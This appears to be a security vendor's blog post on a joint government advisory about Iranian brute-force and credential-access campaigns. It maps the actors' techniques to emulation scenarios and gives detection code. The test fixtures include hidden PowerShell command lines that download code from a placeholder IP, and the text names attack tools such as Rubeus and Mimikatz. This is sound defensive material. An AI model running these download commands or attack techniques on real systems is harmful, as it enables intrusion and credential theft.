On October 16, 2024, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a Cybersecurity Advisory (CSA) to warn network defenders of Iranian cyber actors’ use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors.

Since October 2023, Iranian actors have used brute force, such as password spraying, and multifactor authentication (MFA) ‘push bombing’ to compromise user accounts and obtain access to organizations. The actors frequently modified MFA registrations, enabling persistent access. The actors performed discovery on the compromised networks to obtain additional credentials and identify other information that could be used to gain additional points of access.

The authoring agencies assess that the Iranian actors likely aim to obtain credentials and information describing the victim’s network, which can then be sold on cybercriminal forums to actors who may use the information to conduct additional malicious activity.

AttackIQ has released a new assessment template that brings together the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by these Iranian adversaries during their latest activities to help customers validate their security controls and their ability to defend against this disruptive and destructive threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against a highly opportunistic Initial Access Broker (IAB).
  • Assess your security posture against a threat interested in harvesting profiling and credential information that could be used for subsequent attacks.
  • Continuously validate detection and prevention pipelines against the playbook of a threat specializing in Brute-Forcing and MFA-based attacks.

[CISA AA24-290A] Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations

This assessment template compiles the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by these Iranian adversaries during their most recent activities.

The assessment template is divided into tactics, grouping the techniques and implementations used by the actors at each stage of their activities:

1. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

Virtualization/Sandbox Evasion (T1497): This scenario will call the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.

2. Credential Access

Consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping.

Credentials from Password Stores: Windows Credential Manager (T1555.004): This scenario employs the built-in Windows tool cmdkey to discover cached credentials on a system.

Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003): This scenario demonstrates a Kerberoasting attack using Rubeus, which lets an attacker request service tickets for accounts that have a Service Principal Name (SPN) and attempt to extract their password hashes from those tickets.

3. Discovery

Consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act.

Remote System Discovery (T1018): This scenario uses the native nltest utility with the /dclist option to enumerate the domain controllers associated with a domain.

Domain Trust Discovery (T1482): This scenario uses the native nltest utility with the /trusted_domains option to list all the domain trust relationships for the domain associated with the host.

Permission Groups Discovery: Domain Groups (T1069.002): This scenario uses the net.exe utility to list the members of the Domain Admins and Enterprise Admins domain groups.

4. Lateral Movement

Consists of techniques that adversaries use to enter and control remote systems on a network.

Remote Services: Remote Desktop Protocol (T1021.001): This scenario attempts to use Remote Desktop Protocol (RDP) to move laterally to additional hosts on the network.

5. Command and Control

Techniques that adversaries may use to communicate with systems under their control within a victim network.

Ingress Tool Transfer (T1105): This scenario downloads known malicious samples, to memory in one scenario and to disk in a second, to test network and endpoint controls and their ability to prevent the delivery of those samples.

6. Exfiltration

Consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption.

Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of sensitive files using HTTP POST requests.

Opportunities to Expand Emulation Capabilities

In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.

  • Password Brute-Force: This scenario simulates a password brute-force attack on a specified machine to test the effectiveness of security controls against multiple failed login attempts.
  • PCAP Replay – RDP Brute Force: This scenario simulates an RDP brute force attack by replaying network packets between two assets in a controlled environment. The attack consists of 40 login attempts against an RDP server on port 3389/TCP.
  • PCAP Replay – SSH Brute Force: This scenario simulates an SSH brute force attack by replaying network packets between two assets in a controlled environment. The attack consists of 120 login attempts against an SSH server on port 22/TCP.
  • PCAP Replay – SMB Brute Force: This scenario simulates an SMB brute force attack by replaying network packets between two assets in a controlled environment. The attack consists of 222 login attempts against an SMB server on port 445/TCP.
  • PCAP Replay – LDAP Brute Force: This scenario simulates an LDAP brute force attack by replaying network packets between two assets in a controlled environment. The attack consists of 50 failed login attempts using different passwords for the “admin” user account against an LDAP server on port 389/TCP.
  • PCAP Replay – SMB Password Spraying: This scenario simulates an SMB password spraying attack by replaying network packets between two assets on port 445/TCP. Password spraying is a brute force technique where an attacker tries to log in using a list of usernames with a default or predictable password, avoiding account lockout by attempting only one login per user account.
  • PCAP Replay – LDAP Password Spraying: This scenario simulates an LDAP password spraying attack by replaying network packets between two assets on port 389/TCP. Password spraying is a brute force technique where an attacker tries to log in using a list of usernames with a default or predictable password, avoiding account lockout by attempting only one login per user account.
  • PCAP Replay – Kerberoasting Attack using Impacket’s GetUserSPNs.py Script: This scenario simulates a Kerberoasting attack using Impacket’s GetUserSPNs.py script by replaying network packets between two assets in a controlled environment. The attack aims to obtain a password hash of an Active Directory (AD) user account with a Service Principal Name (SPN).
  • Zerologon Attack with Mimikatz: This scenario focuses on determining if the domain controller is vulnerable to the critical Zerologon vulnerability using the Mimikatz tool. Note: This scenario attempts to identify and exploit the Zerologon vulnerability. This can impact Domain Controller functions and result in service degradation. It should not be run in a production environment.
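The password spraying and brute force scenarios above differ in shape: spraying touches many accounts once or twice each, while brute forcing hammers one account. As an added example (not part of the AttackIQ template or the advisory), the following Python applies that distinction to failed-logon records to label each source address; the source addresses, user names and timestamps are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon events (source IP, target user, ISO timestamp); not real telemetry.
FAILED_LOGONS = [
    ("203.0.113.5", "alice", "2024-10-16T08:00:01"),
    ("203.0.113.5", "bob", "2024-10-16T08:00:04"),
    ("203.0.113.5", "carol", "2024-10-16T08:00:07"),
    ("203.0.113.5", "dave", "2024-10-16T08:00:10"),
    ("203.0.113.5", "erin", "2024-10-16T08:00:13"),
    ("203.0.113.5", "frank", "2024-10-16T08:00:16"),
] + [  # one account, ten failures in under a minute
    ("198.51.100.7", "admin", f"2024-10-16T09:15:{s:02d}") for s in range(0, 40, 4)
] + [  # a user mistyping a password twice: neither pattern
    ("192.0.2.20", "alice", "2024-10-16T10:02:30"),
    ("192.0.2.20", "alice", "2024-10-16T10:02:45"),
]

def classify_sources(events, window=timedelta(minutes=10), spray_users=5,
                     spray_max_per_user=2, brute_attempts=8):
    """Label each source 'spray' (many users, few tries each) or 'brute' (many tries on
    one user) from the failures that fall inside a sliding time window; thresholds are
    illustrative and should be tuned to the environment's lockout policy."""
    by_src = defaultdict(list)
    for src, user, ts in events:
        by_src[src].append((datetime.fromisoformat(ts), user))
    labels = {}
    for src, items in by_src.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # Advance the window start so every item in [start, end] lies within `window`.
            while items[end][0] - items[start][0] > window:
                start += 1
            per_user = Counter(user for _, user in items[start:end + 1])
            if len(per_user) >= spray_users and max(per_user.values()) <= spray_max_per_user:
                labels[src] = "spray"
                break
            if max(per_user.values()) >= brute_attempts:
                labels[src] = "brute"
                break
    return labels

if __name__ == "__main__":
    print(classify_sources(FAILED_LOGONS))  # {'203.0.113.5': 'spray', '198.51.100.7': 'brute'}
```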

Detection and Mitigation Opportunities

Given the number of techniques used by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

2. Ingress Tool Transfer (T1105):

Adversaries often rely heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

2a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
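To show how the signature above behaves on real-looking process-creation telemetry, here is an added Python implementation (not AttackIQ's or CISA's code) run over a handful of constructed Sysmon-style events; the image paths, command lines and the 192.0.2.10 address are made up.

```python
import re

# Signature from the page: (cmd.exe OR powershell.exe) whose command line contains
# (IWR OR Invoke-WebRequest) AND DownloadData AND Hidden. Matching is case-insensitive
# because PowerShell cmdlet names and parameters are.
TARGET_PROCESSES = {"cmd.exe", "powershell.exe"}
DOWNLOAD_CMDLETS = ("iwr", "invoke-webrequest")

def matches_ingress_signature(image: str, cmdline: str) -> bool:
    """True when a process-creation event satisfies the T1105 download signature."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name not in TARGET_PROCESSES:
        return False
    cl = cmdline.lower()
    # Whole-token match so 'iwr' does not fire on unrelated words that merely contain it.
    has_cmdlet = any(re.search(r"\b" + re.escape(c) + r"\b", cl) for c in DOWNLOAD_CMDLETS)
    return has_cmdlet and "downloaddata" in cl and "hidden" in cl

def find_matches(events):
    """Indices of the events (dicts with 'image' and 'cmdline') that match the signature."""
    return [i for i, e in enumerate(events)
            if matches_ingress_signature(e["image"], e["cmdline"])]

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -WindowStyle Hidden -c "$c=New-Object Net.WebClient; '
                r'$c.DownloadData((IWR http://192.0.2.10/x).Content)"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign-looking fetch
     "cmdline": r'powershell.exe -c "Invoke-WebRequest https://updates.example.net/pkg.msi '
                r'-OutFile C:\Temp\pkg.msi"'},
    {"image": r"C:\Windows\System32\cmd.exe",  # cmd.exe wrapping a hidden PowerShell download
     "cmdline": "cmd.exe /c powershell -w hidden -Command \"Invoke-WebRequest http://192.0.2.10/b; "
                "(New-Object Net.WebClient).DownloadData('http://192.0.2.10/a')\""},
    {"image": r"C:\Program Files\Editor\editor.exe",  # right tokens, wrong process
     "cmdline": "editor.exe -w Hidden iwr DownloadData"},
]

if __name__ == "__main__":
    print(find_matches(SAMPLE_EVENTS))  # [0, 2]
```

The second event shows the signature's deliberate narrowness: a download without a hidden window and without DownloadData is not flagged, so pair it with broader process-lineage and network telemetry.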

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

3. Exfiltration Over C2 Channel (T1041):

Adversaries may exfiltrate sensitive data from the infected host. IDS/IPS and DLP solutions are well suited to detecting and preventing sensitive files from being sent to a suspicious external host.

3a. Detection

In some cases, data may be exfiltrated without any throttling or additional encoding or encryption from the backdoor. If that’s the case, data is sent via HTTP POST requests in plain text and therefore should be easier to detect using Data Loss Prevention controls.

Additionally, since these requests are not throttled, network traffic can be monitored for anomalous traffic flow patterns that identify single systems, typically client assets, that are sending out significant amounts of data.
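The following Python (an added example, not AttackIQ's code) applies that volume-based idea to constructed outbound HTTP flow records: it totals POST bytes per client and flags any client whose upload volume dwarfs the median of its peers, which is the profile of an unthrottled bulk upload over HTTP. Hostnames, the 198.51.100.77 destination and the byte counts are made up.

```python
from collections import defaultdict
from statistics import median

# Constructed outbound HTTP flow records: (client, destination, method, bytes_out).
FLOWS = (
    [("ws-01", "intranet.example", "POST", 1_200) for _ in range(20)]      # form posts
    + [("ws-02", "mail.example", "POST", 8_000) for _ in range(15)]        # webmail
    + [("ws-03", "cdn.example", "GET", 50_000) for _ in range(30)]         # downloads only
    + [("ws-04", "198.51.100.77", "POST", 950_000) for _ in range(120)]    # bulk upload
)

def post_bytes_per_client(flows):
    """Sum outbound POST bytes and request counts per client."""
    totals = defaultdict(lambda: [0, 0])  # client -> [bytes, requests]
    for client, _dst, method, nbytes in flows:
        if method == "POST":
            totals[client][0] += nbytes
            totals[client][1] += 1
    return totals

def flag_exfil_candidates(flows, ratio=10.0, min_bytes=10_000_000):
    """Return clients whose POST volume exceeds `min_bytes` and `ratio` times the
    median of the other clients; thresholds are illustrative and should be tuned."""
    totals = post_bytes_per_client(flows)
    alerts = {}
    for client, (nbytes, nreq) in totals.items():
        peers = [b for c, (b, _) in totals.items() if c != client]
        baseline = median(peers) if peers else 0
        if nbytes >= min_bytes and nbytes > ratio * baseline:
            alerts[client] = {"bytes": nbytes, "requests": nreq, "peer_median": baseline}
    return alerts

if __name__ == "__main__":
    print(flag_exfil_candidates(FLOWS))  # only ws-04 is reported
```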

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations:

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against this sophisticated threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a well-known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.